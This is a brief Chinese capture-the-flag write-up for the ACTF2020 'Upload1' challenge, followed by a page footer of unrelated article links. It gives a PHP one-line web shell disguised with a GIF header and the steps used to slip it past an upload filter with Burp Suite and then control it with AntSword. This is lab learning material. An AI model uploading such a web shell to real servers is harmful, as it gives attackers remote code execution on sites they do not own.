1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马
GIF89a? <script language="php">eval($_REQUEST[1])</script>
2、使用bp抓包修改后缀,点击发送
3、不关浏览器的代理,在bp中将该包放行
4、用蚁剑连接
5、在根目录中找到flag
[ACTF2020 新生赛]Upload1
不拿flag不改名2024-09-12 13:20
相关推荐
冬奇Lab19 分钟前
稳定性性能系列之六——Java异常与JE分析实战爱装代码的小瓶子1 小时前
【c++进阶】c++11的魔法:从模板到可变模板.lxysbly2 小时前
安卓MD模拟器下载指南2026冬奇Lab2 小时前
Android反模式警示录:System.exit(0)如何制造546ms黑屏少年执笔2 小时前
android新版TTS无法进行语音播报2501_946244782 小时前
Flutter & OpenHarmony OA系统底部导航栏组件开发指南chen_mangoo2 小时前
Android10低电量无法打开相机洞见不一样的自己3 小时前
Kotlin的inline、noinline、crossinline全面分析idealzouhu3 小时前
【Android】深入浅出 JNI2501_944446003 小时前
Flutter&OpenHarmony字体与排版设计